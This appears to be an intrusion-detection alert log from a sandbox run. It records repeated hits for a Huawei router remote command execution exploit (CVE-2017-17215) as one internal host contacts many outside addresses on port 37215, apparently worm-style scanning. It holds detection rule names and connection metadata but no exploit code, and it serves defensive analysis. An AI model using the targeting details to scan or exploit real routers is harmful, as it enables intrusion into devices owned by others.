                                                    07/10/24-08:27:03.012568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632837215192.168.2.14157.237.37.2
                                                    07/10/24-08:27:05.176375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764037215192.168.2.14152.247.81.160
                                                    07/10/24-08:27:17.078859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054437215192.168.2.1477.155.76.91
                                                    07/10/24-08:26:52.017294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024637215192.168.2.14191.221.196.10
                                                    07/10/24-08:26:38.520023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054437215192.168.2.14157.60.206.41
                                                    07/10/24-08:26:47.824141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804237215192.168.2.14207.6.241.219
                                                    07/10/24-08:26:55.398753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493237215192.168.2.14157.225.117.104
                                                    07/10/24-08:27:07.325434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3993837215192.168.2.142.149.72.29
                                                    07/10/24-08:26:25.486596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435637215192.168.2.14197.110.16.247
                                                    07/10/24-08:26:28.895682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664237215192.168.2.14157.233.195.45
                                                    07/10/24-08:27:02.887848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048237215192.168.2.14197.229.104.77
                                                    07/10/24-08:26:28.918557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560637215192.168.2.14197.119.220.72
                                                    07/10/24-08:26:23.282247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975037215192.168.2.1441.163.134.179
                                                    07/10/24-08:26:11.446922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729837215192.168.2.14197.29.115.65
                                                    07/10/24-08:26:36.440849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560237215192.168.2.14197.85.73.217
                                                    07/10/24-08:26:17.963816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542437215192.168.2.14157.175.24.80
                                                    07/10/24-08:26:51.924375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900037215192.168.2.14157.14.102.245
                                                    07/10/24-08:26:15.872361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651437215192.168.2.14157.157.81.159
                                                    07/10/24-08:27:05.234090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788037215192.168.2.1441.250.205.45
                                                    07/10/24-08:27:20.496994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4161837215192.168.2.1441.249.195.178
                                                    07/10/24-08:26:33.260181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966837215192.168.2.14143.133.59.51
                                                    07/10/24-08:26:38.518117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112237215192.168.2.14157.63.177.14
                                                    07/10/24-08:26:23.287711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398637215192.168.2.14197.180.64.170
                                                    07/10/24-08:26:47.930940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099437215192.168.2.14157.51.92.102
                                                    07/10/24-08:26:59.533066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3767037215192.168.2.1441.218.25.12
                                                    07/10/24-08:27:08.398717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285837215192.168.2.1441.167.173.158
                                                    07/10/24-08:26:43.772556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702637215192.168.2.14197.42.119.64
                                                    07/10/24-08:27:19.222748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059037215192.168.2.1496.167.206.111
                                                    07/10/24-08:26:49.910333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552437215192.168.2.14197.77.125.124
                                                    07/10/24-08:27:22.935877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5159637215192.168.2.14157.27.72.240
                                                    07/10/24-08:27:05.097626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738837215192.168.2.14157.98.85.186
                                                    07/10/24-08:26:49.795487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838637215192.168.2.1441.129.77.247
                                                    07/10/24-08:26:17.972432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021837215192.168.2.14157.201.197.77
                                                    07/10/24-08:26:59.724469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580637215192.168.2.14197.142.222.165
                                                    07/10/24-08:27:24.938068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635837215192.168.2.14157.114.44.83
                                                    07/10/24-08:27:30.505030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475437215192.168.2.14197.129.244.146
                                                    07/10/24-08:26:43.695229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686837215192.168.2.14197.144.87.81
                                                    07/10/24-08:27:24.976669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676037215192.168.2.1441.113.77.248
                                                    07/10/24-08:26:29.888155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4427637215192.168.2.14157.219.59.64
                                                    07/10/24-08:27:14.822336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834637215192.168.2.14197.128.45.232
                                                    07/10/24-08:27:02.908970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600437215192.168.2.14197.102.135.63
                                                    07/10/24-08:26:43.872664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473437215192.168.2.1441.113.236.131
                                                    07/10/24-08:27:03.033670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4119237215192.168.2.1441.50.223.94
                                                    07/10/24-08:27:24.997758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437437215192.168.2.14132.70.38.13
                                                    07/10/24-08:27:31.507602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948437215192.168.2.14197.116.224.244
                                                    07/10/24-08:26:38.630807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139837215192.168.2.14157.111.82.204
                                                    07/10/24-08:26:57.641730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654837215192.168.2.14129.26.112.154
                                                    07/10/24-08:27:30.499089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843837215192.168.2.1441.152.117.189
                                                    07/10/24-08:26:26.432231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658037215192.168.2.1441.190.102.202
                                                    07/10/24-08:26:49.836491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387837215192.168.2.14220.49.205.209
                                                    07/10/24-08:26:51.952619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150637215192.168.2.14197.204.166.66
                                                    07/10/24-08:27:13.905585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822037215192.168.2.14197.249.240.218
                                                    07/10/24-08:26:17.939725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437037215192.168.2.141.150.137.34
                                                    07/10/24-08:26:45.669699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792037215192.168.2.14130.196.76.139
                                                    07/10/24-08:27:23.864190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311237215192.168.2.14197.131.15.31
                                                    07/10/24-08:27:19.324318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071837215192.168.2.1441.197.45.20
                                                    07/10/24-08:26:26.600239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273237215192.168.2.1441.242.0.206
                                                    07/10/24-08:27:33.926621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065637215192.168.2.14135.34.134.66
                                                    07/10/24-08:26:33.249834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820437215192.168.2.1441.229.109.34
                                                    07/10/24-08:26:41.325591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697437215192.168.2.1414.228.35.126
                                                    07/10/24-08:26:49.834879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593037215192.168.2.1441.47.193.211
                                                    07/10/24-08:26:23.355050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876437215192.168.2.14197.150.137.185
                                                    07/10/24-08:26:41.615223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495437215192.168.2.14157.167.148.25
                                                    07/10/24-08:27:02.928138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089237215192.168.2.14197.176.112.114
                                                    07/10/24-08:26:20.157992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518637215192.168.2.1441.78.241.220
                                                    07/10/24-08:26:59.604052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851037215192.168.2.14144.100.93.156
                                                    07/10/24-08:26:22.224405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053637215192.168.2.14197.158.255.38
                                                    07/10/24-08:26:45.624283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347637215192.168.2.14129.145.76.120
                                                    07/10/24-08:26:42.440336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857837215192.168.2.14157.233.250.255
                                                    07/10/24-08:27:22.856390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686037215192.168.2.1441.244.158.222
                                                    07/10/24-08:26:15.872780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838437215192.168.2.14194.132.244.169
                                                    07/10/24-08:26:20.147730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839837215192.168.2.14157.18.40.11
                                                    07/10/24-08:26:59.623898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447637215192.168.2.14157.180.147.239
                                                    07/10/24-08:27:30.538016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887037215192.168.2.1485.166.172.45
                                                    07/10/24-08:26:13.826034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443837215192.168.2.1441.45.132.242
                                                    07/10/24-08:27:27.177891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077037215192.168.2.14157.5.172.21
                                                    07/10/24-08:26:28.795318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656437215192.168.2.14105.56.33.82
                                                    07/10/24-08:26:43.839334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964437215192.168.2.14197.151.149.61
                                                    07/10/24-08:26:57.664786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019037215192.168.2.14157.98.232.23
                                                    07/10/24-08:27:19.302131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3888237215192.168.2.14197.252.100.209
                                                    07/10/24-08:26:38.511212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6059037215192.168.2.1441.218.166.228
                                                    07/10/24-08:26:45.588243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744237215192.168.2.1446.60.193.152
                                                    07/10/24-08:26:41.422305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639637215192.168.2.149.102.111.167
                                                    07/10/24-08:26:26.600322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4945837215192.168.2.14216.6.0.90
                                                    07/10/24-08:26:13.767213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574237215192.168.2.14197.103.234.199
                                                    07/10/24-08:27:30.414315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285237215192.168.2.14157.66.83.75
                                                    07/10/24-08:26:28.917896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841037215192.168.2.14197.170.252.202
                                                    07/10/24-08:26:13.832527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775837215192.168.2.1495.40.15.152
                                                    07/10/24-08:27:33.947642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063037215192.168.2.1441.13.117.1
                                                    07/10/24-08:26:47.978865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058437215192.168.2.14183.16.93.195
                                                    07/10/24-08:27:30.407360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683637215192.168.2.14197.3.118.236
                                                    07/10/24-08:27:17.041321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595037215192.168.2.14197.148.44.162
                                                    07/10/24-08:26:38.563022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644237215192.168.2.14157.13.186.253
                                                    07/10/24-08:27:30.443855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5569837215192.168.2.14157.20.104.50
                                                    07/10/24-08:27:24.980775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188037215192.168.2.14157.118.99.67
                                                    07/10/24-08:27:23.866031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899037215192.168.2.14197.19.134.249
                                                    07/10/24-08:26:41.603089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688237215192.168.2.14168.47.174.82
                                                    07/10/24-08:27:03.007893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045237215192.168.2.14197.229.107.143
                                                    07/10/24-08:27:08.392064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704437215192.168.2.1441.197.111.112
                                                    07/10/24-08:27:08.444805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3642037215192.168.2.1441.93.3.135
                                                    07/10/24-08:26:28.911510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356637215192.168.2.1441.168.138.33
                                                    07/10/24-08:26:52.032840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3976037215192.168.2.1441.182.112.137
                                                    07/10/24-08:27:02.968527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227037215192.168.2.14125.94.143.72
                                                    07/10/24-08:27:03.011735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517637215192.168.2.1441.241.105.141
                                                    07/10/24-08:26:43.924330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469837215192.168.2.1441.128.43.141
                                                    07/10/24-08:26:49.822276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735437215192.168.2.14157.228.235.44
                                                    07/10/24-08:26:49.778030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180437215192.168.2.1441.31.145.234
                                                    07/10/24-08:27:23.924577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4456637215192.168.2.14157.172.112.52
                                                    07/10/24-08:26:26.441172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068837215192.168.2.14157.26.238.219
                                                    07/10/24-08:27:02.865689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4301037215192.168.2.14110.30.75.88
                                                    07/10/24-08:27:17.062116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290237215192.168.2.14149.231.16.44
                                                    07/10/24-08:26:36.409717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986837215192.168.2.14157.197.114.141
                                                    07/10/24-08:27:32.569954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507637215192.168.2.14157.163.221.97
                                                    07/10/24-08:26:13.816887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569237215192.168.2.14197.120.226.35
                                                    07/10/24-08:26:57.501573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825037215192.168.2.14197.184.89.174
                                                    07/10/24-08:27:24.983853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338037215192.168.2.14197.15.43.220
                                                    07/10/24-08:26:45.652225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353837215192.168.2.1441.105.151.64
                                                    07/10/24-08:26:57.619988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392037215192.168.2.1441.81.162.70
                                                    07/10/24-08:26:29.868553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060237215192.168.2.1441.33.188.120
                                                    07/10/24-08:26:31.065444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4731037215192.168.2.14157.175.224.62
                                                    07/10/24-08:27:23.928325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413237215192.168.2.1487.155.8.174
                                                    07/10/24-08:27:28.115496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424437215192.168.2.14143.32.154.61
                                                    07/10/24-08:27:30.554316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212837215192.168.2.1441.135.47.170
                                                    07/10/24-08:26:34.197956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191837215192.168.2.14157.249.33.15
                                                    07/10/24-08:26:59.544166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5062237215192.168.2.14197.133.184.153
                                                    07/10/24-08:26:14.805928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934437215192.168.2.1441.201.127.25
                                                    07/10/24-08:26:43.646157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265637215192.168.2.14141.169.91.115
                                                    07/10/24-08:27:14.022886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5513837215192.168.2.14197.6.147.191
                                                    07/10/24-08:26:28.822867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994237215192.168.2.1441.162.110.188
                                                    07/10/24-08:27:05.129654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546637215192.168.2.1441.16.41.140
                                                    07/10/24-08:27:31.570253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289637215192.168.2.14197.255.106.8
                                                    07/10/24-08:26:59.607971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814637215192.168.2.14157.87.163.28
                                                    07/10/24-08:27:32.563593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885637215192.168.2.14197.254.167.90
                                                    07/10/24-08:26:28.761940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881037215192.168.2.14157.73.20.146
                                                    07/10/24-08:26:17.995767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626237215192.168.2.1441.107.135.49
                                                    07/10/24-08:26:43.752135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985637215192.168.2.1495.22.151.78
                                                    07/10/24-08:26:49.825628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868637215192.168.2.14115.184.167.249
                                                    07/10/24-08:26:43.821479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589037215192.168.2.14157.168.37.128
                                                    07/10/24-08:26:53.200630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006637215192.168.2.14197.142.20.71
                                                    07/10/24-08:27:05.193569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011037215192.168.2.14157.75.200.124
                                                    07/10/24-08:27:19.287568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835037215192.168.2.14157.95.141.107
                                                    07/10/24-08:26:11.136584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744837215192.168.2.14197.77.24.89
                                                    07/10/24-08:26:59.771211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065237215192.168.2.1441.255.213.211
                                                    07/10/24-08:26:28.763825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795837215192.168.2.14197.91.223.211
                                                    07/10/24-08:26:31.091002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455037215192.168.2.1441.77.23.78
                                                    07/10/24-08:27:22.468391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531837215192.168.2.1441.44.227.193
                                                    07/10/24-08:27:31.514336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474037215192.168.2.14157.195.18.139
                                                    07/10/24-08:26:28.682326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335837215192.168.2.14119.220.244.20
                                                    07/10/24-08:26:31.108287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793837215192.168.2.14197.49.91.45
                                                    07/10/24-08:26:42.352780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103637215192.168.2.14157.81.206.243
                                                    07/10/24-08:26:57.662908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4583837215192.168.2.14197.33.64.244
                                                    07/10/24-08:27:19.163791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484037215192.168.2.14197.143.89.117
                                                    07/10/24-08:26:22.301586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634237215192.168.2.14157.38.14.166
                                                    07/10/24-08:26:23.313392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097037215192.168.2.14212.202.89.137
                                                    07/10/24-08:26:55.417071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722237215192.168.2.14139.37.4.170
                                                    07/10/24-08:27:30.472890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972837215192.168.2.14197.27.183.71
                                                    07/10/24-08:26:26.595344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541637215192.168.2.14197.239.125.157
                                                    07/10/24-08:27:20.488925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983837215192.168.2.14157.97.122.101
                                                    07/10/24-08:27:22.800658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328037215192.168.2.148.91.152.237
                                                    07/10/24-08:27:22.773467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109837215192.168.2.14197.127.34.64
                                                    07/10/24-08:26:29.888154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349037215192.168.2.14157.78.177.120
                                                    07/10/24-08:27:19.146990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5831437215192.168.2.14185.135.101.136
                                                    07/10/24-08:27:17.018335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5701437215192.168.2.1458.208.209.209
                                                    07/10/24-08:27:22.794160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090637215192.168.2.14157.131.182.56
                                                    07/10/24-08:26:29.864759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403437215192.168.2.14197.107.102.13
                                                    07/10/24-08:27:33.726260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167437215192.168.2.1449.51.231.239
                                                    07/10/24-08:27:22.532217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765037215192.168.2.14157.32.167.86
                                                    07/10/24-08:27:30.489960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5889437215192.168.2.14157.34.45.185
                                                    07/10/24-08:27:22.856924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636637215192.168.2.14157.91.189.221
                                                    07/10/24-08:26:36.361562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341837215192.168.2.14197.211.187.208
                                                    07/10/24-08:27:20.396105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038637215192.168.2.14197.103.182.85
                                                    07/10/24-08:27:19.256775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482637215192.168.2.1441.9.233.201
                                                    07/10/24-08:27:27.047599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923237215192.168.2.1465.92.237.52
                                                    07/10/24-08:27:17.019850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883637215192.168.2.1441.144.116.144
                                                    07/10/24-08:26:42.427094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000637215192.168.2.14200.192.43.157
                                                    07/10/24-08:26:42.412698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792237215192.168.2.14197.49.104.249
                                                    07/10/24-08:26:43.680100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192437215192.168.2.14197.27.212.215
                                                    07/10/24-08:27:11.513310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450837215192.168.2.14197.168.198.222
                                                    07/10/24-08:27:05.169661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192837215192.168.2.14197.249.189.182
                                                    07/10/24-08:27:17.034911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357837215192.168.2.1491.190.96.60
                                                    07/10/24-08:27:24.941876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257837215192.168.2.1441.244.184.145
                                                    07/10/24-08:27:07.259692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275637215192.168.2.14221.135.51.124
                                                    07/10/24-08:26:55.302858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994637215192.168.2.14197.233.97.223
                                                    07/10/24-08:26:55.322726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3955237215192.168.2.14197.186.2.42
                                                    07/10/24-08:27:27.108573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631637215192.168.2.14157.182.189.248
